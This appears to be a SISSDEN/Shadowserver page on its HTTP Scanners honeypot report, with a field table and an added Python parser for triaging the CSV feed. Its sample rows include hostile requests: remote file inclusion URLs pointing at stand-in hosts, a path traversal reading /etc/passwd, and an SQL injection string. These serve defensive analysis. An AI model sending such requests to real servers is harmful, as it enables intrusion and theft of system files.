The primary objective of the SISSDEN project is to offer National CERTs, ISPs and network owners free reports on malicious activity detected on their networks. This is achieved through the establishment of a network of honeypots. One of these honeypots is dedicated to observing HTTP scanning activity. HTTP scanning may be part of benign activity - for example, a search engine indexing the web, a research project, or an organization like the Shadowserver Foundation looking for open/vulnerable services that it can report to National CERTs and network owners so that they remediate their networks. Other scans may be part of network reconnaissance that is a preparatory phase for an attack. In other cases, the scan itself is the attack, such as an SQL injection, Remote File Inclusion (RFI) or Local File Inclusion (LFI) attempt, or a specific exploit for a vulnerability. Quite often the scanning is carried out by a botnet that is actively looking to infect new sites or devices.
Below is a description of a report based on data collected by SISSDEN HTTP-aware honeypots. Aside from registering the source of the scan, the honeypot logs the request in raw form and attempts to match the scan or attack against a known pattern. In cases where a malicious artifact was collected by the honeypot (for example the file a remote inclusion attempt pointed at), its MD5 and SHA256 hashes are also recorded. This information may be used by a CSIRT to support the investigation of an incident and to determine its true nature.
| Field | Description |
| --- | --- |
| timestamp | Time that the scan was performed, in UTC |
| ip | The IP address performing the scan |
| port | The source port used in the scan |
| asn | ASN announcing the scanning IP |
| geo | Country where the scanning IP resides |
| region | State / Province / Administrative region where the scanning IP resides |
| city | City where the scanning IP resides |
| hostname | PTR record of the scanning IP |
| type | Type of activity observed, i.e. http-scan |
| dst_ip | The IP address of the target device |
| dst_port | Destination port used in the scan |
| dst_asn | ASN announcing the target IP |
| dst_geo | Country where the target IP resides |
| dst_dns | FQDN of the target, if applicable and recorded |
| naics | North American Industry Classification System code of the scanning IP |
| sic | Standard Industrial Classification code of the scanning IP |
| sector | Sector the scanning IP belongs to |
| dst_sector | Sector the target IP belongs to |
| public_source | Source of the data, for cases where the source accepts being credited |
| sensorid | ID of the sensor (target device) |
| pattern | Request pattern, if recognized by the target sensor (e.g. does it match an RFI, LFI, SQLi ...) |
| url | URL being requested by the scanning IP |
| file_md5 | MD5 hash of the file downloaded, if any |
| file_sha256 | SHA256 hash of the file downloaded, if any |
| request_raw | Raw request sent by the scanning IP |
As of 13th September 2018, the HTTP Scanners report has been included in Shadowserver's reports and is being sent to 92+ National CSIRTs and 4200+ network owners as part of the free daily victim remediation feeds, in easily parsable CSV format. Anonymized samples of the reports being sent out are available here. If you are a network owner or CSIRT and wish to receive reports from SISSDEN you can either subscribe directly to Shadowserver's feeds or do so through the SISSDEN Customer Portal, which will be made available soon. Existing Shadowserver subscribers will get the free HTTP Scanners daily report automatically.
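To show how a CSIRT or network owner might consume the daily CSV described by the field table above, here is an added example (not code from SISSDEN or Shadowserver) that parses a report, validates the header against the documented fields, buckets each row by the sensor's `pattern` match, extracts the remote hosts that RFI attempts tried to make the target fetch, and collects the hashes of dropped files as indicators. The sample rows are constructed (TEST-NET addresses, documentation ASNs, made-up hashes), and the pattern labels `rfi`, `lfi` and `sqli` are assumed values: the page only says a row's pattern may match an RFI, LFI or SQLi, not which strings the feed uses.

```python
import csv
import io
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Column names as listed in the field table of the HTTP Scanners report. The feed
# is CSV with a header row, so we match on names rather than column positions.
REPORT_FIELDS = [
    "timestamp", "ip", "port", "asn", "geo", "region", "city", "hostname", "type",
    "dst_ip", "dst_port", "dst_asn", "dst_geo", "dst_dns", "naics", "sic", "sector",
    "dst_sector", "public_source", "sensorid", "pattern", "url", "file_md5",
    "file_sha256", "request_raw",
]

# Constructed sample report, not real feed data. Pattern values are assumed labels.
SAMPLE_CSV = """\
timestamp,ip,port,asn,geo,region,city,hostname,type,dst_ip,dst_port,dst_asn,dst_geo,dst_dns,naics,sic,sector,dst_sector,public_source,sensorid,pattern,url,file_md5,file_sha256,request_raw
2018-09-13 04:12:07,192.0.2.10,51432,64496,ZZ,,,,http-scan,198.51.100.5,80,64497,ZZ,,0,0,,,,s1,rfi,/index.php?page=http://203.0.113.9/x.txt?,,,GET /index.php?page=http://203.0.113.9/x.txt? HTTP/1.1
2018-09-13 04:12:09,192.0.2.10,51433,64496,ZZ,,,,http-scan,198.51.100.6,80,64497,ZZ,,0,0,,,,s1,rfi,/wp-content/plugins/foo/x.php?src=http://203.0.113.77/sh.txt,0123456789abcdef0123456789abcdef,0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef,GET /wp-content/plugins/foo/x.php?src=http://203.0.113.77/sh.txt HTTP/1.1
2018-09-13 05:01:44,192.0.2.20,40001,64498,ZZ,,,,http-scan,198.51.100.5,80,64497,ZZ,,0,0,,,,s1,lfi,/cgi-bin/view.cgi?file=../../../../etc/passwd,,,GET /cgi-bin/view.cgi?file=../../../../etc/passwd HTTP/1.1
2018-09-13 05:30:02,192.0.2.30,40002,64498,ZZ,,,,http-scan,198.51.100.7,8080,64497,ZZ,,0,0,,,,s2,sqli,/item.php?id=1'%20OR%20'1'='1,,,GET /item.php?id=1'%20OR%20'1'='1 HTTP/1.1
2018-09-13 06:00:00,192.0.2.40,40003,64499,ZZ,,,crawler.example.net,http-scan,198.51.100.5,80,64497,ZZ,,0,0,,,,s1,,/,,,GET / HTTP/1.1
"""

# A pattern the sensor recognized but that is not one of the three named on the page.
ATTACK_CATEGORIES = {"rfi", "lfi", "sqli", "other-pattern"}


def parse_report(text):
    """Parse one daily CSV report; reject a file whose header lacks a documented field."""
    reader = csv.DictReader(io.StringIO(text))
    missing = [f for f in REPORT_FIELDS if f not in (reader.fieldnames or [])]
    if missing:
        raise ValueError(f"report header missing fields: {missing}")
    return [{k: (v or "").strip() for k, v in row.items()} for row in reader]


def classify(row):
    """Bucket a row by the sensor's pattern match; an empty pattern is a plain scan."""
    p = row["pattern"].lower()
    if p in ("rfi", "lfi", "sqli"):
        return p
    return "other-pattern" if p else "unclassified-scan"


def remote_include_hosts(row):
    """Hosts an RFI attempt tried to make the target fetch: URL-valued query parameters."""
    hosts = set()
    for values in parse_qs(urlsplit(row["url"]).query, keep_blank_values=True).values():
        for v in values:
            if v.startswith(("http://", "https://", "ftp://")):
                host = urlsplit(v).hostname
                if host:
                    hosts.add(host)
    return hosts


def summarize(rows):
    """Per scanning IP: categories seen, targets touched, dropped-file hashes, RFI hosts."""
    out = {}
    for row in rows:
        s = out.setdefault(row["ip"], {"categories": Counter(), "targets": set(),
                                       "sha256": set(), "rfi_hosts": set()})
        cat = classify(row)
        s["categories"][cat] += 1
        s["targets"].add(row["dst_ip"])
        if row["file_sha256"]:
            s["sha256"].add(row["file_sha256"])
        if cat == "rfi":
            s["rfi_hosts"] |= remote_include_hosts(row)
    return out


def hostile_ips(summary):
    """Scanning IPs with at least one request the sensor matched as an attack pattern."""
    return sorted(ip for ip, s in summary.items()
                  if any(c in ATTACK_CATEGORIES for c in s["categories"]))


if __name__ == "__main__":
    report = summarize(parse_report(SAMPLE_CSV))
    for ip in hostile_ips(report):
        s = report[ip]
        print(ip, dict(s["categories"]), sorted(s["targets"]),
              sorted(s["rfi_hosts"]), sorted(s["sha256"]))
```

The header check matters because the real feed may gain columns over time; matching on field names keeps the parser working as long as the documented ones are present. The RFI host extraction and the SHA256 set are the two things worth feeding onward: the former are hosts serving the payload a scanner wanted your server to include, the latter let you check whether that payload has already been seen elsewhere.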
This is the second SISSDEN report being sent out to the community, after the Brute Force report, which has been going out on a daily basis since April 2018.